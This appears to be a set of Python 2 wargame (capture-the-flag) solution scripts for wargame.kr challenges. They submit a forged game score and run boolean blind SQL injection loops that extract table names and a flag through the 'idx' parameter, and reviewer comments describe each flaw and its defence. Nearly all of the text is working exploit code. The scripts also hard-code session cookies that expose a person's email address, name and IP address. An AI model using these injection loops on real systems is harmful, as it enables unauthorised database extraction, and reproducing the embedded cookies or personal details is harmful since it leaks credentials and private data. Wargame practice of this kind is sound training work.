# -*- coding: utf-8 -*-
import urllib, urllib2, sys

# PoC for the "fly me to the moon" challenge (Python 2: urllib2, print statement).
# Two requests: GET token.php to obtain a token, then POST a client-chosen
# score together with that token to high-scores.php.  The weakness this
# demonstrates is that the score is supplied by the client; a token alone
# does not make a client-reported value trustworthy.  Defence: derive or
# validate the score server-side instead of accepting the submitted number.
url = "http://wargame.kr:8080/fly_me_to_the_moon/"  # defined but not used below
score_url = "http://wargame.kr:8080/fly_me_to_the_moon/high-scores.php"
token_url = "http://wargame.kr:8080/fly_me_to_the_moon/token.php"
# Fixed browser-like User-Agent sent on both requests.
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): a live session id is hard-coded, and the ci_session value
# below is a serialized session whose keys (session_id, ip_address,
# user_agent, name, email, ...) are readable in the URL-encoded blob.
# Session cookies are credentials; publishing them in a script is a leak.
# Load them from the environment or a local, untracked file instead.
PHPSESSID = "jfovvtct42sj2atn25n902fmi7"

# Step 1: fetch the token.  The whole response body is used as the token value.
req = urllib2.Request(token_url)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
res = urllib2.urlopen(req).read()
# Step 2: form-encode the chosen score plus the token and POST it with the
# same cookies.  Passing a body to urllib2.Request makes this a POST.
dat = {'score': "31337", 'token': res}
dat = urllib.urlencode(dat)
req = urllib2.Request(score_url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+";"
               +"ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")

# Print the server's reply to the score submission (no error handling:
# urlopen raises on HTTP errors and the script simply terminates).
res = urllib2.urlopen(req).read()
print res



post로 넘어가는 값에서 인젝션이 먹힌다.

일단 소스 


# -*- coding: utf-8 -*-
# Number of tables -- boolean-based blind SQL injection PoC (Python 2).
# The `idx` POST parameter evidently reaches the SQL query unsanitized, so a
# condition can be appended to it.  Each request asks one yes/no question;
# the answer is read from whether the normal record page comes back.
# Defence: cast `idx` to an integer or bind it as a query parameter.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): live session id hard-coded; the ci_session blob below also
# embeds readable profile fields (ip_address, name, email, ...).  Keep such
# values out of published scripts.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

# Try each candidate count i in [0, 50).  The injected IF() evaluates to the
# valid record id 17038 only when the count equals i (otherwise 0), so only
# the matching guess returns the real record.
for i in range(50):
    dat = {'idx': "17038 and if((select count(table_name) from information_schema.tables)="+str(i)+",17038,0)"}
    dat = urllib.urlencode(dat)
    req = urllib2.Request(url,dat)
    req.add_header("User-agent", user_agent)
    req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
    res = urllib2.urlopen(req).read()

    # Oracle: the timestamp of record 17038 appears only on a "true" response.
    if "2017-02-23 19:47:27" in res:
        print "[*]Find tables count! : " + str(i)
        break
        # Unreachable: `break` above already leaves the loop.
        sys.exit(1)
# -*- coding: utf-8 -*-
# Table names -- character-by-character blind SQL injection PoC (Python 2).
# Same oracle as the table-count script; here each request tests one
# byte of one table name.  Defence is the same: never concatenate `idx`
# into SQL; use an integer cast or a bound parameter.
import urllib, urllib2,sys

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): hard-coded live session cookie (see ci_session below as well).
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

# n selects the table row via `limit n,1`; only rows 40, 41 and 42 are read.
n = 40
while n < 43:
    # Despite the name, `flag` accumulates the recovered table name.
    flag = ""
    # i = character position passed to substring(); j = candidate byte
    # value 36..89, compared as a hex literal (hex(j)[2:] drops Python's
    # "0x" prefix, which is then re-added as a literal).
    for i in range(40):
        for j in range(36,90):
            dat = {'idx': "17038 and if(substring((select table_name from information_schema.tables limit "+str(n)+",1),"+str(i)+",1)="+"0x"+hex(j)[2:]+",17038,0)"}
            dat = urllib.urlencode(dat)
            req = urllib2.Request(url,dat)
            req.add_header("User-agent", user_agent)
            req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                        + "ci_session="+"a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%22a7095fb884baece73aeac4455d091c1e%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487849256%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1487848366%3B%7D07e7b2991c534171d406dbbeeb95548fd72b86b8")
            res = urllib2.urlopen(req).read()

            # A "true" response carries the known timestamp of record 17038;
            # the matching byte is appended and the next position is tried.
            if "2017-02-23 19:47:27" in res:
                flag += chr(j)
                print "[+]Find! : " + chr(j)
                break
                # Unreachable: `break` above already leaves the inner loop.
                sys.exit(1)
    # Positions with no matching byte are silently skipped, so the printed
    # string may be shorter than the real name.
    print "[*]Find flag! : " + flag
    n += 1
# Column names -- a single boolean check (Python 2).  Despite the header,
# this snippet only tests whether information_schema.columns holds exactly
# 486 rows and prints the raw response; no names are extracted here.
import urllib, urllib2

url = "http://wargame.kr:8080/ip_log_table/chk.php"
user_agent= "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729"
# NOTE(review): hard-coded live session cookie; the ci_session value below
# differs from the earlier scripts (a 10-element serialized session) but
# still exposes profile fields in clear.
PHPSESSID = "iobpqpqjlpam4boq5fv0vidpl0"

# IF() returns the valid record id 17053 when the count is 486, else 0.
dat = {'idx': "17053  and if((select count(column_name) from information_schema.columns)=486,17053,0)"}
dat = urllib.urlencode(dat)
req = urllib2.Request(url,dat)
req.add_header("User-agent", user_agent)
req.add_header('Cookie', "PHPSESSID="+PHPSESSID+"; "
                + "ci_session="+"a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229c4639bdd4c2b4e5fdd6c246f1e79011%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487934026%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%228400%22%3B%7Dba943cf039368323def355883b41fbefa82da0c6")
res = urllib2.urlopen(req).read()
# The response is printed as-is; the reader judges true/false by eye.
print res


# Table-name injection against SimpleBoard -- blind SQL injection over a GET
# parameter (Python 2).  The payload is hand URL-encoded (%20 for spaces)
# and appended to `idx` in the query string.  The oracle is a fixed string
# from the legitimately rendered post.  Defence: treat `idx` as an integer
# (cast or bound parameter) before it reaches the query.
# -*-coding:utf8 -*-

import urllib2

print "[*] start!"
# n selects the table row via `limit n,1`, for rows 0..42.
n = 0
while n < 43:
    dat = ""
    # i = substring() position; j = candidate byte 48..96 sent as a hex literal.
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20table_name%20from%20information_schema.tables%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            # NOTE(review): a live ci_session cookie is hard-coded in the
            # headers; it embeds readable profile fields (ip_address, name,
            # email, ...).  Do not publish scripts with real session cookies.
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            # "True" branch: the real post renders and contains this greeting.
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    # Positions with no match are skipped, so `dat` may be shorter than the name.
    print "[*]Find table " + dat
    n += 1
print "[*] Finish!"
# Retrieve the flag -- same GET-based blind injection as the table-name
# script, now reading the FLAG column of README (Python 2).
# Author's note (translated): needs a little tweaking, but the answer comes out.
# -*-coding:utf8 -*-
import urllib2
print "[*] start!"
# n selects the row via `limit n,1`; the loop still walks 0..42 although the
# number of rows in README is not established anywhere in this script.
n = 0
while n < 43:
    dat = ""
    # i = substring() position; j = candidate byte 48..96 sent as a hex literal.
    for i in range(45):
        for j in range(48,97):
            param = "1%20and%20substring((select%20FLAG%20from%20README%20limit%20"+str(n)+",1),"+str(i)+",1)=0x"+hex(j)[2:]
            url = "http://wargame.kr:8080/SimpleBoard/read.php?idx="+param
            # NOTE(review): live ci_session cookie hard-coded (same value as
            # the previous script); it carries readable profile fields.
            req = urllib2.Request(url, headers={'Host': 'wargame.kr:8080',
                                            'Cookie': 'ci_session=a%3A10%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%225b072841ee99129eeeabec29e6d6df40%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22121.64.136.131%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A101%3A%22Mozilla%2F5.0+%28Windows+NT+6.1%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F55.0.2883.75+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1487497579%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A9%3A%22%EC%86%8C%EC%B0%AC%EC%98%81%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22scy7885%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A4%3A%226750%22%3B%7Ded248a2ed859a72f3df787f4750c0184da001470'})
            res = urllib2.urlopen(req).read()
            # Oracle string from the legitimately rendered post.
            if "G00d m0rn1ng~" in res:
                dat += chr(j)
                break
    print "[*]Find KEY " + dat
    n += 1
print "[*] Finish!"
